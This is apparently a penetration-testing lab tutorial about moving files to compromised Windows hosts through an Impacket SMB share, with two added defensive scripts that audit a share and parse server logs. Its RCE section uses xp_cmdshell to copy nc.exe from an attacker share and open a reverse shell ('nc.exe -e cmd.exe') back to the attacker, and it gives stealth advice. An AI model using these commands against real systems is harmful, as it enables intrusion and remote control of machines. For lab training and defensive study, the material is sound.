Moving files to and from a compromised Linux machine is, in general, pretty easy. You’ve got nc, wget, curl, and if you get really desperate, base64 copy and paste. Windows is another issue altogether. PowerShell makes this somewhat easier, but for a lot of the PWK labs, the systems are too old to have PowerShell. The course material goes over a few ways to achieve this, but it doesn’t cover my favorite: SMB. This may be less realistic in an environment where you have to connect from a victim machine back to your attacker box over the public internet (where SMB could be blocked), but for environments like the PWK labs and HTB, where you are VPNed into the same LAN as your targets, it works great.

Overview

The goal here is to get easy file transfer to and from a compromised Windows host. To do this, we’ll create an SMB share on our local box, and then connect to that share from the compromised Windows host. From there, we can copy files into the shared folder on either host, and then access them on the other host.

Server

Installation

The Impacket tool set comes pre-installed on Kali. If you don’t have it for some reason, you can install it with apt install python-impacket. You can also clone the SecureAuth Corp Impacket git repo if you want the most up-to-date version.

Starting the Server

To get the server up and running on our local box, simply enter the following:

# impacket-smbserver shareName sharePath
  • shareName - can be anything you want, but you’ll need to know this in order to connect back to the share
  • sharePath - the folder you want shared

(The Kali package installs the script as impacket-smbserver; if you run it from a git checkout of Impacket, it’s smbserver.py in the examples directory.)

Example

For example, I keep a tools directory with a bunch of common stuff I might need as I work through my labs:

root@kali# ls tools/
25912.exe              cachedump.exe  lonelypotato.exe  ms11-046.exe  MS14-002.exe      MS14-070.exe  nc.exe     PwDump.exe        wce32.exe   windows-privesc-check2.exe
37049-32.exe           ff.exe         mimikatz          MS11-046.exe  MS14-070          MS14-070.rar  plink.exe  rottenpotato.exe  wce64.exe   winx86_meterpreter_80.exe
accesschk-2003-xp.exe  fgdump.exe     mimikatz.exe      MS13-053.exe  MS14-070_adduser  nc64.exe      Privesc    sysinternals      whoami.exe  winx86_stageless_shell_80.exe

Others like to create an smb directory for each target and drop the necessary files into it.

Then I can share this directory as follows:

root@kali# impacket-smbserver smb tools/
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
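Everything under sharePath is now readable and writable by anyone who can reach port 445 on your box, so it’s worth a quick look at what you are about to expose before starting the server. The following script is an added example (not part of this post and not part of Impacket): it refuses outright to share / or your home directory, and reports files that look like notes, keys or captures rather than tools, plus symlinks that would let the share reach outside the directory. The directory names and filename patterns it checks are assumptions chosen for illustration; adjust them to your own layout.

```python
"""Pre-flight check for a directory about to be exposed with impacket-smbserver.

Added example, not from the original post or from Impacket. The share the post
creates is unauthenticated and writable by anyone on the LAN, so everything
under sharePath is exposed. This script refuses obviously bad choices (/ or
$HOME) and flags files that don't belong in a throw-away tools share.
"""
import os
import sys
from pathlib import Path

# Assumed/constructed lists for the example: tune them to your own setup.
SENSITIVE_DIR_NAMES = {"notes", ".ssh", ".gnupg", "loot", "creds"}
SENSITIVE_SUFFIXES = {".md", ".txt", ".kdbx", ".pem", ".key", ".ovpn", ".pcap"}
SENSITIVE_NAMES = {"id_rsa", "id_ed25519", ".bash_history", "hashes", "passwords"}


def _home_dir():
    """Resolved home directory, or None when it cannot be determined."""
    try:
        return Path.home().resolve()
    except RuntimeError:
        return None


def audit_share(share_path, max_files=2000):
    """Inspect share_path and return {'ok', 'reasons', 'flagged', 'count'}.

    'reasons' are hard failures (don't share this directory at all);
    'flagged' are individual entries worth removing before sharing.
    """
    root = Path(share_path).expanduser().resolve()
    result = {"ok": True, "reasons": [], "flagged": [], "count": 0}

    if not root.is_dir():
        result["ok"] = False
        result["reasons"].append(f"{root} is not a directory")
        return result
    # Sharing / or $HOME exposes far more than a tools folder.
    if root == Path("/") or root == _home_dir():
        result["ok"] = False
        result["reasons"].append(f"refusing to share {root}: far more than a tools folder")
    if root.name.lower() in SENSITIVE_DIR_NAMES:
        result["ok"] = False
        result["reasons"].append(f"refusing to share {root}: looks like a sensitive directory")
    if not result["ok"]:
        return result

    for dirpath, dirnames, filenames in os.walk(root):
        for d in list(dirnames):
            p = Path(dirpath) / d
            if p.is_symlink():
                # A symlinked directory can point anywhere on the box; note it, don't descend.
                result["flagged"].append(f"{p}: symlinked directory -> {os.readlink(p)}")
                dirnames.remove(d)
            elif d.lower() in SENSITIVE_DIR_NAMES:
                result["flagged"].append(f"{p}: sensitive directory name")
        for f in filenames:
            p = Path(dirpath) / f
            result["count"] += 1
            if p.is_symlink():
                result["flagged"].append(f"{p}: symlink -> {os.readlink(p)}")
            elif f.lower() in SENSITIVE_NAMES or p.suffix.lower() in SENSITIVE_SUFFIXES:
                result["flagged"].append(f"{p}: looks like notes/keys/captures, not a tool")
            if result["count"] >= max_files:
                # A tools share is small; thousands of files means the wrong directory.
                result["ok"] = False
                result["reasons"].append(f"{max_files}+ files: not a dedicated tools share")
                return result
    return result


def main(argv):
    if len(argv) != 2:
        print(f"usage: {argv[0]} sharePath", file=sys.stderr)
        return 2
    r = audit_share(argv[1])
    for reason in r["reasons"]:
        print(f"[!] {reason}")
    for item in r["flagged"]:
        print(f"[?] {item}")
    print(f"[*] {r['count']} file(s) under {argv[1]}, {len(r['flagged'])} flagged")
    return 0 if r["ok"] and not r["flagged"] else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as python3 check_share.py tools/ before impacket-smbserver smb tools/; a non-zero exit means either the directory should not be shared at all or something in it deserves a second look first.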

Client

Syntax

From the Windows host, we use the built-in net use command to connect to our share. Here are three examples of the syntax:

C:\>net use
C:\>net use \\[host]\[share name]
C:\>net use /d \\[host]\[share name]

The first command will list all currently connected shares. The second will create a connection to the named share at the given host (in our case, typically an IP address). The third command will close that connection.

Once that runs, you can reference the share by its full UNC path.

Examples

With Shell

Let’s say we wanted to copy a privesc binary to the host. We could do the following:

Connect to the share:

C:\>net use \\10.11.0.XXX\smb
net use \\10.11.0.XXX\smb
The command completed successfully.

Copy the file:

C:\WINDOWS\Temp>copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe
copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe
        1 file(s) copied.

To Get Shell From RCE

In a different case, I only had access to a MySQL database, and wanted to get a full shell. I used xp_cmdshell to map my drive, copy nc to the host, and run it:

1> xp_cmdshell 'net use \\10.11.0.XXX\smb'
2> go
        output
        ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        The command completed successfully.
        NULL
        NULL
(return status = 0)

1> xp_cmdshell 'copy \\10.11.0.XXX\smb\nc.exe \windows\temp\nc.exe'
2> go
        output
        ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
                1 file(s) copied.
                NULL
(return status = 0)

1> xp_cmdshell '\windows\temp\nc.exe -e cmd.exe 10.11.0.XXX 443'
2> go

Opsec Notes

Locally

When you run this server, you’ve created an unauthenticated share on the network that anyone can read from and write to. That’s why it’s important not to share anything sensitive (like your notes directory), as someone could mess with or delete those files.

It’s also a good idea to take down the share when you’re not using it.

You will be able to tell when a new host connects to your share, and when it disconnects:

[*] Incoming connection (10.11.1.X,3187)
[*] AUTHENTICATE_MESSAGE (\,USERNAME)
[*] User \USERNAME authenticated successfully
[*] :::00::4141414141414141
[*] Closing down connection (10.11.1.5,3187)
[*] Remaining connections []
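Because the share accepts any username with no password, that console output is the only record of who touched it. The script below is an added example (not from this post and not part of Impacket) that reads saved smbserver output, pairs each Incoming connection with its Closing down connection by (ip, port), picks up the account name from the AUTHENTICATE_MESSAGE line, and flags any client whose address isn’t in a list of the hosts you expect to connect from. The regular expressions are written against the log lines shown above, the AUTHENTICATE_MESSAGE line is attributed to the most recent still-open session (a heuristic, since impacket prints no connection id on it), and the embedded log and allowlist are constructed for the example.

```python
"""Summarise impacket-smbserver console output and flag unexpected clients.

Added example, not from the original post or from Impacket. Feed it a file of
saved server output (impacket-smbserver smb tools/ | tee smb.log) or run it
with no arguments to process the constructed sample below.
"""
import re
import sys
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Patterns written against the lines impacket-smbserver prints (see above).
RE_OPEN = re.compile(r"Incoming connection \(([^,]+),(\d+)\)")
RE_AUTH = re.compile(r"AUTHENTICATE_MESSAGE \(([^,]*),([^)]*)\)")
RE_CLOSE = re.compile(r"Closing down connection \(([^,]+),(\d+)\)")


@dataclass
class Session:
    ip: str
    port: int
    domain: str = ""
    user: str = ""
    closed: bool = False
    expected: bool = True


def parse_smbserver_log(lines, allowed_clients: Set[str]) -> List[Session]:
    """Return one Session per (ip, port) seen in the log, in order of arrival."""
    sessions: List[Session] = []
    still_open: Dict[Tuple[str, int], Session] = {}
    for line in lines:
        m = RE_OPEN.search(line)
        if m:
            s = Session(ip=m.group(1), port=int(m.group(2)),
                        expected=m.group(1) in allowed_clients)
            sessions.append(s)
            still_open[(s.ip, s.port)] = s
            continue
        m = RE_AUTH.search(line)
        if m:
            # No connection id on this line: attribute it to the newest open
            # session that has no user yet (fine when sessions don't overlap).
            for s in reversed(sessions):
                if not s.closed and not s.user:
                    s.domain, s.user = m.group(1), m.group(2)
                    break
            continue
        m = RE_CLOSE.search(line)
        if m:
            s = still_open.pop((m.group(1), int(m.group(2))), None)
            if s is not None:
                s.closed = True
    return sessions


def unexpected_clients(sessions: List[Session]) -> List[str]:
    """Addresses that connected but are not in the allowlist."""
    return sorted({s.ip for s in sessions if not s.expected})


def report(sessions: List[Session]) -> List[str]:
    """One human-readable line per session."""
    out = []
    for s in sessions:
        dom = s.domain.strip("\\")          # impacket prints an empty domain as "\"
        state = "closed" if s.closed else "STILL OPEN"
        tag = "" if s.expected else "  <-- not in allowlist"
        out.append(f"{s.ip}:{s.port} as {dom}\\{s.user or '?'} [{state}]{tag}")
    return out


# Constructed sample in the same shape as the server output shown above.
SAMPLE_LOG = r"""[*] Config file parsed
[*] Incoming connection (10.11.1.5,3187)
[*] AUTHENTICATE_MESSAGE (\,USERNAME)
[*] User \USERNAME authenticated successfully
[*] :::00::4141414141414141
[*] Closing down connection (10.11.1.5,3187)
[*] Remaining connections []
[*] Incoming connection (10.11.1.99,49211)
[*] AUTHENTICATE_MESSAGE (WORKGROUP,someone)
[*] User WORKGROUP\someone authenticated successfully
[*] Remaining connections [('10.11.1.99', 49211)]
"""
# Constructed: the target(s) you actually intend to connect from.
ALLOWED_CLIENTS = {"10.11.1.5"}


def main(argv):
    if len(argv) > 1:
        with open(argv[1]) as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LOG.splitlines()
    sessions = parse_smbserver_log(lines, ALLOWED_CLIENTS)
    for line in report(sessions):
        print(line)
    bad = unexpected_clients(sessions)
    if bad:
        print(f"[!] unexpected client(s): {', '.join(bad)}")
    return 1 if bad else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

A session reported as STILL OPEN when you are done with a box is a reminder to run net use /d on the target, or simply to stop the server, which also answers the point above about taking the share down when it isn’t in use.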

On Target

net use also has an option that lets you reference a connected share by a new drive letter. To do this, just run:

C:\>net use p: \\10.11.0.X\smb

From there, you can change to that drive, which makes it easier to interact with. It’s also poor opsec: a user on the box is unlikely to see a connected share, but might very well notice a new drive letter. The same goes for others in the labs with you attacking the same box. It’s worth the extra trouble to just use the UNC path.